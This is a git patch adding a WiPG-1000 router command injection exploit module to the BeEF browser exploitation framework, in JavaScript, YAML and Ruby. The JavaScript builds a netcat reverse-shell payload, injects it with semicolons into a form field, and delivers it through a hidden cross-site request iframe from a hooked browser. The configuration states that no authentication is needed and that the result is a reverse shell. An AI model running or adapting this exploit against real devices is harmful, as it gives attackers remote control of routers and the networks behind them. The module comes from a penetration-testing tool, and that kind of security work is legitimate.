From 46a395e04477315fde4dcb3d8cb158c2f213b1c3 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Sat, 22 Apr 2017 23:34:07 +0000
Subject: [PATCH] Add WiPG-1000 Command Injection exploit module

---
 .../router/wipg1000_cmd_injection/command.js  | 32 +++++++++++++++++++
 .../router/wipg1000_cmd_injection/config.yaml | 15 +++++++++
 .../router/wipg1000_cmd_injection/module.rb   | 25 +++++++++++++++
 3 files changed, 72 insertions(+)
 create mode 100644 modules/exploits/router/wipg1000_cmd_injection/command.js
 create mode 100644 modules/exploits/router/wipg1000_cmd_injection/config.yaml
 create mode 100644 modules/exploits/router/wipg1000_cmd_injection/module.rb

diff --git a/modules/exploits/router/wipg1000_cmd_injection/command.js b/modules/exploits/router/wipg1000_cmd_injection/command.js
new file mode 100644
index 000000000..79ec7bea3
--- /dev/null
+++ b/modules/exploits/router/wipg1000_cmd_injection/command.js
@@ -0,0 +1,32 @@
+//
+// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>';
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+  var timeout = 15;
+
+  var url = "http://" + rhost + ":" + rport + "/cgi-bin/rdfs.cgi";
+  var fifo = '/tmp/' + Math.random().toString(36).substring(7);
+  var payload = 'mkfifo ' + fifo + '; nc ' + lhost + ' ' + lport + ' 0<' + fifo + ' | /bin/sh >' + fifo + ' 2>&1; rm ' + fifo;
+
+  beef.debug("[WiPG-1000 Command Injection] Sending payload: " + url);
+  var wipg1000_cmd_injection_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(
+    url, 'POST', 'application/x-www-form-urlencoded', [
+      {'type':'hidden', 'name':'Client', 'value':';' + payload + ';'},
+      {'type':'hidden', 'name':'Download', 'value':'Download'}
+    ]);
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(wipg1000_cmd_injection_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", timeout*1000);
+
+});
+
diff --git a/modules/exploits/router/wipg1000_cmd_injection/config.yaml b/modules/exploits/router/wipg1000_cmd_injection/config.yaml
new file mode 100644
index 000000000..fa3f4f338
--- /dev/null
+++ b/modules/exploits/router/wipg1000_cmd_injection/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        wipg1000_cmd_injection:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "WiPG-1000 Command Injection"
+            description: "This module exploits a <a href='https://www.redguard.ch/advisories/wepresent-wipg1000.txt'>command injection vulnerability</a> in WiPG-1000 routers.<br/>An authenticated session is not required.<br/><br/>Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local interface and port specified below.<br/><br/>This module has not been tested."
+            authors: ["Matthias Brun"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/router/wipg1000_cmd_injection/module.rb b/modules/exploits/router/wipg1000_cmd_injection/module.rb
new file mode 100644
index 000000000..10b53fe19
--- /dev/null
+++ b/modules/exploits/router/wipg1000_cmd_injection/module.rb
@@ -0,0 +1,25 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Wipg1000_cmd_injection < BeEF::Core::Command
+  
+  def self.options
+    @configuration = BeEF::Core::Configuration.instance
+    lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    lhost = '' if lhost.to_s.eql?('0.0.0.0')
+
+    return [
+        { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.100.10'},
+        { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+        { 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+        { 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'}
+    ]
+  end
+  
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+  
+end